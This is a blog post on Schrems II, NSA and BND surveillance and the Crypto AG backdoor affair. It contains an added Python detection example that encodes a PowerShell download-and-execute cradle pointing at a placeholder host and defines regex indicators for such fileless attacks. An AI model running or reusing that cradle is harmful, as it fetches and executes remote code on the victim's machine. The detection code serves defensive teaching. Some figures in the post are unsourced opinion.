Wednesday, November 25, 2020

Schrems-II OR the myth of data security outside of US companies like MS

UPDATED 18.12.2020 (Added 7. Dagger Complex)

Today it's time to sort out some important things about cybersecurity and the Schrems II myth that "data is secure as soon as it is out of reach of the NSA and of US-based companies that can be compelled by NSLs (National Security Letters)". That would include Microsoft with its cloud offerings (its headquarters are in the Seattle area, in Redmond, Washington State) as well as Google, Facebook and Amazon.

The very short story: when it comes to cyber security and cyber protection there are several kinds of adversary. Against some of them you can protect yourself (even with Microsoft's security tools, the Microsoft Intelligent Security Graph and the toolset built on it, which is still unbeaten in this area). These are the typical hackers.

Against others you simply cannot protect yourself, because they operate on a completely different level. That includes the NSA and probably also MOSSAD / SHIN BET (during my time in Israel I met some former Israeli military people (e.g. from Unit 8200) who now work in cyber security. Have you ever wondered why so many cyber security startups come from Israel? It is caused by their military: surrounded by their enemies, they are forced to be specialists in this). If you are interested in this, here is a great article from the Jerusalem Post.

Now let's come to the really long story (hopefully you have time; I think it is worth it, but grab a coffee! After the legal part it gets better than James Bond!)

But first let us sort out some things and be open about them.

1. Let's first come to Mr. Max Schrems. He is an Austrian lawyer, author and data protection activist. I do not want to judge his motives, and whether he is a US or MS hater or not, who knows.

2. Now let's come to the current Schrems II ruling. The EU-US Privacy Shield was originally created in response to the Schrems I ruling (which had invalidated its predecessor, Safe Harbor). It fell last summer, in July 2020.

"The CJEU ruled that the Privacy Shield does not provide adequate protection, and invalidated the agreement. The court also ruled that European data protection authorities must stop transfers of personal data made under the standard contractual clauses by companies, like Facebook, subject to overbroad surveillance. This decision has significant implications for U.S. Companies and for the U.S. Congress because it calls into question the adequacy of privacy protection in the United States." ( Press Release)

Microsoft created a smart interim solution until the (slower) lawmakers in the EU and the US sort these things out in another legal way.

a. The Microsoft cloud operates under the EU Standard Contractual Clauses (SCCs), which are independent of the EU-US Privacy Shield.

b. The very long story on this, and how it relates to Microsoft 365, is in this blog post from data protection lawyer Koellner (sorry, it is in German, which fits, as this matters very much to Germans: we take everything very seriously. What is a joke? I don't know jokes. I am a German :-D).

c. The latest answer from Microsoft on this, by Julie Brill (Corporate Vice President and Chief Privacy Officer at Microsoft, 19 November 2020), including a financial commitment. I think this is, up to now, still a good reason to stick with the Microsoft cloud.

OK, for now I think we can stop the legal discussion and come to the real beef!

3. Let's first talk about the NSA's global surveillance capabilities. The capabilities they had some years ago were revealed by the Snowden leak (2013), and that is what is known (un)officially. That leak is more than seven years old now; do not think they have not improved their systems since.

We always talk about lawful access to data in a central datacenter and how we need to protect against that. And here you are absolutely wrong! From a purely legal perspective you are right, but not in the NSA case.

Even if they do not (yet) have direct access to the data in a US company's datacenter somewhere on earth, the data still has to be transmitted to or from your computer, and that endpoint is the real crown jewel. Once they own it they have everything: your data, your microphone, your camera and everything that is going on on your screen.

Their toolset uses lots of still unknown zero-day exploits in a highly automated manner. They point it at an IP address and that's it. Game over (for you).

And don't think "my virus scanner will save me". Often it can't: around 50% of attacks run "in memory only", with nothing ever written to disk, so a file-based AV scanner has nothing to scan.

Microsoft developed Advanced Threat Protection (Microsoft Defender ATP, now called Microsoft Defender for Endpoint) to cover this sort of attack as well, by looking at what code does when it runs rather than only at files.
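To make the "in memory only" point concrete, here is an added example (not part of the original post, and not code from Microsoft or any product named here) of why a file-based scanner misses a fileless attack while a behaviour-based check over the same telemetry does not. The event records, their field names (`text`, `on_disk`) and the PowerShell download cradle are constructed for illustration: the cradle points at the non-routable host example.invalid and is never executed, only scanned.

```python
import base64
import hashlib
import re

# PowerShell's -EncodedCommand takes base64 of UTF-16LE text.
def encode_powershell(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

def decode_powershell(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")

# Constructed telemetry (NOT real logs). Each record mimics a process command
# line or a script-block text as an EDR would see it; "on_disk" holds the script
# file path and is empty when the code only ever existed in memory. The field
# names are illustrative assumptions, not a real event schema.
CRADLE = ("IEX (New-Object Net.WebClient)"
          ".DownloadString('http://example.invalid/stage.ps1')")

SAMPLE_EVENTS = [
    {"id": 1, "text": "Get-Process | Where-Object { $_.CPU -gt 100 }", "on_disk": ""},
    {"id": 2, "text": "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE), "on_disk": ""},
    {"id": 3, "text": "$a = [Convert]::FromBase64String($blob); [System.Reflection.Assembly]::Load($a)", "on_disk": ""},
    {"id": 4, "text": "Get-Content C:\\reports\\q3.txt | Measure-Object -Line", "on_disk": "C:\\scripts\\report.ps1"},
]

# Signature list of a traditional file scanner (constructed). It even knows the
# cradle by hash, but never gets to hash it: the cradle is never written to disk.
KNOWN_BAD_SHA256 = {hashlib.sha256(CRADLE.encode()).hexdigest()}


def file_scanner(events, known_bad):
    """Hash-based scanning: only code that touches the filesystem is inspected."""
    hits = []
    for ev in events:
        if not ev["on_disk"]:
            continue  # nothing on disk, nothing to hash
        if hashlib.sha256(ev["text"].encode()).hexdigest() in known_bad:
            hits.append(ev["id"])
    return hits


# Behaviour-based scanning: decode what is hidden, then look at what the code does.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (pattern, weight): one strong indicator or two weak ones cross the threshold.
INDICATORS = [
    (r"Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod", 1),
    (r"DownloadString|DownloadFile", 1),
    (r"\bIEX\b|Invoke-Expression", 1),
    (r"-w(?:indowstyle)?\s+hidden", 1),
    (r"FromBase64String", 1),
    (r"Reflection\.Assembly\]::Load", 2),
]
THRESHOLD = 2


def expand_encoded(text: str) -> str:
    """Append the decoded payload of every -EncodedCommand so the regexes see the real code."""
    out = text
    for m in ENC_RE.finditer(text):
        try:
            out += "\n" + decode_powershell(m.group(1))
        except (ValueError, UnicodeDecodeError):
            pass  # not a valid payload, leave the raw text as it is
    return out


def behaviour_scanner(events):
    """Return {event id: [matched indicators]} for events whose score reaches THRESHOLD."""
    hits = {}
    for ev in events:
        text = expand_encoded(ev["text"])
        matched = [(p, w) for p, w in INDICATORS if re.search(p, text, re.I)]
        if sum(w for _, w in matched) >= THRESHOLD:
            hits[ev["id"]] = [p for p, _ in matched]
    return hits


if __name__ == "__main__":
    print("file scanner hits:      ", file_scanner(SAMPLE_EVENTS, KNOWN_BAD_SHA256))  # []
    print("behaviour scanner hits: ", sorted(behaviour_scanner(SAMPLE_EVENTS)))        # [2, 3]
```

Run it and the file scanner reports nothing, because the cradle in event 2 never touched the disk even though its hash is on the block list, while the behaviour scanner flags events 2 and 3 after decoding the -EncodedCommand payload. That decode step is the whole point: detection has to look at what code does when it runs (the kind of telemetry PowerShell script block logging and EDR tooling provide), not at what sits on the filesystem.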

Another serious and very hard to handle attack vector is firmware. Because the implant sits below the operating system, software running on the host cannot see or control it. Just imagine a network adapter with hacked firmware: everything can be read and manipulated at the very last stage before the bytes hit the wire! (Measured boot and firmware attestation exist precisely to make such tampering visible, but they only cover the components that are actually measured.)

4. Now let's talk about encryption. We believe (oh yeah) we are using the latest and greatest encryption. (And I am not talking right now about quantum computing, which is another huge threat just around the corner; I will cover this in another blog post.)

When you do some research on this you will come across NSA Suite B Cryptography (WARNING: NIST official website!), now replaced by the Commercial National Security Algorithm Suite (CNSA) (WARNING: NSA official website!).

Hmm, let's think for a moment! If there is a Suite B (publicly known encryption algorithms), isn't there also a Suite A, and when does the NSA advise using which one?

First of all: there is indeed a Suite A. While Suite B uses algorithms you already know very well, like AES (Advanced Encryption Standard), elliptic-curve Diffie-Hellman/ECDSA and SHA-2, Suite A contains classified algorithms you may never have heard of, with fancy names like ACCORDION, BATON, FIREFLY, JOSEKI, KEESEE, MAYFLY, MEDLEY, SAVILLE, SHILLELAGH, WALBURN or WEASEL.

OK, when is which one used (according to the official CNSSI 4009 National Information Assurance glossary definitions)?

"Suite A:
A specific set of classified cryptographic algorithms used for the protection of some categories of restricted mission critical information.

Suite B:
A specific set of cryptographic algorithms suitable for protecting both classified and unclassified national security systems and information throughout the US government and to support interoperability with allies and coalition partners."

Translated: when Suite B is not considered safe enough, the US government uses Suite A for the really sensitive stuff.

Wait a moment, something comes to my (history) mind. When did the US government officially allow browsers with 128-bit SSL encryption to be exported? Only at the end of the 1990s; until then the rest of the world got "export grade" 40-bit keys. They started to release it when they were able to break it themselves!

Translated: we only give others encryption that we are able to break ourselves.

5. And now let's come to the greatest coup the CIA ever pulled off (I still can't stop laughing at how bold they were). It is the case of Crypto AG, also known as "Operation Rubikon" (Rubicon). And that is actually why you are not even safe in Germany with German vendors!

But for a better understanding, a short lesson in SIGINT (signals intelligence) history. The so-called Five Eyes (US, UK, Canada, Australia, New Zealand) operate the global surveillance network.

The German BND (Bundesnachrichtendienst, the German counterpart of the CIA) has its roots in the Gehlen Organization, the successor of the German military intelligence of the Second World War. After the war many of these people were recruited again for the Gehlen Org, which later became the BND and already in its early years had very strong ties to the CIA, not least because of the Cold War. So let's say the BND is a very good buddy of the CIA and the NSA. Just read the book "Bedingt dienstbereit: Im Herzen des BND" by the former BND agents Norbert Juretzko and Wilhelm Dietl (sorry, it is in German only).

And believe it or not, back in the good old days many countries and militaries thought: hey, it is a bad idea to buy encryption equipment from US companies, they might have embedded backdoors. Better go to people with a strong "security" reputation anyway, and that's Switzerland. They are absolutely neutral towards everybody (that is what they state; whether they really are, I don't know).

So: let's look for a Swiss company to get really trustworthy and reliable encryption devices for truly secure communications, to prevent any espionage on our communication and data.

The CIA noticed this behaviour too, and feared losing control. Hmm, what to do? This was the birth of "Operation Rubikon", and it lasted for five decades, until 2018!

Here is the story (directly from Wikipedia; I couldn't write it better):
"Crypto AG was a Swiss company specialising in communications and information security. It was secretly jointly owned by the American Central Intelligence Agency (CIA) and West German Federal Intelligence Service (BND) from 1970 until about 1993, with the CIA continuing as sole owner until about 2018. With headquarters in Steinhausen, the company was a long-established manufacturer of encryption machines and a wide variety of cipher devices. 

The company had about 230 employees, had offices in Abidjan, Abu Dhabi, Buenos Aires, Kuala Lumpur, Muscat, Selsdon and Steinhausen, and did business throughout the world. The owners of Crypto AG were unknown, supposedly even to the managers of the firm, and they held their ownership through bearer shares. 

The company has been criticised for selling backdoored products to benefit the American, British and German national signals intelligence agencies, the National Security Agency (NSA), the Government Communications Headquarters (GCHQ), and the BND, respectively. On 11 February 2020, The Washington Post, ZDF and SRF revealed that Crypto AG was secretly owned by the CIA in a highly classified partnership with West German intelligence, and the spy agencies could easily break the codes used to send encrypted messages. The operation was known first by the code name "Thesaurus" and later "Rubicon". According to a Swiss parliamentary investigation, "Swiss intelligence service were aware of and benefited from the Zug-based firm Crypto AG’s involvement in the US-led spying"."

6. And believe it or not, it gets even better. The new BND law legalizes global data gathering (sorry, the article is in German; the law also applies to other countries worldwide), even up to an amount of data the BND could probably not handle (initially "limited" to at most 50% of all global communication). Just to give them some kind of limit; we do not want to have them without limits. :-D

7. Since the end of the Second World War the US intelligence community has had a number of SIGINT stations in Germany. For example, check out the story behind the Dagger Complex in Darmstadt (which is soon to be moved to Wiesbaden); see the Wikipedia article.

Conclusion: being a German company storing data in Germany with a German vendor means nothing by itself! You are not even safe on your own premises.

Unless you put your computer in an independent bunker with its own electricity and no internet connection, you are definitely not safe in this world!

So my recommendation: don't do anything unlawful and you are not interesting to them.